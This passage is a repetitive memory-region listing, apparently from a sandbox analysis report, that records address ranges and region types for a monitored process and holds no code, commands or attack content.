filename = "" Region: id = 8906 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8907 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8908 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8909 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8910 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8911 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8912 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8913 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8914 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8915 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8916 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8917 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8918 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8919 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8920 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8921 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8922 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8923 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8924 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8925 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8926 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8927 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8928 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8929 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8930 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8931 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8932 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8933 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8934 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8935 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8936 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8937 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8938 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8939 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8940 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8941 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8942 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8943 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8944 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8945 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8946 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8947 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8948 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8949 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8950 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8951 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8952 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8953 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8954 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8955 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8956 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8957 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8958 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8959 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8960 start_va = 0x460000 end_va = 0x463fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 8961 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8962 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8963 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8964 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8965 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8966 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8967 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8968 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8969 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8970 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8971 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8972 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8973 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8974 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8975 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8976 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8977 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8978 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8979 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8980 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8981 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8982 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8983 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8984 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8985 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8986 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8987 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8988 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8989 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8990 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8991 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8992 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8993 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8994 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8995 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8996 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8997 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8998 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8999 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9000 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9001 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9002 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9003 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9004 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9005 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9006 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9007 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9008 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9009 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9010 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9011 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9012 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9013 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9014 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9015 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9016 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9017 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9018 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9019 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9020 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9021 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9022 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9023 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9024 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9025 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9026 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9027 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9028 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9029 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9030 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9031 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9032 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9033 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9034 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 9035 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 9036 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9037 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9038 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9039 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9041 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9042 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9043 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9044 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9045 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9046 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9047 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9048 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9049 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9050 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9051 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9052 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9053 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9054 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9055 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9056 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9057 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9058 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9059 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9060 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9061 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9062 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9063 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9064 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9065 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9066 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9067 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9068 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9069 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9070 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9071 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9072 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9073 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9074 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9075 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9076 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9077 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9078 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9079 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9080 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9081 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9082 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9083 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9084 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9085 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9086 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9087 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9088 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9089 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9090 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9091 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9092 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9093 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9094 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9095 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9096 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9097 start_va = 0x400000 end_va = 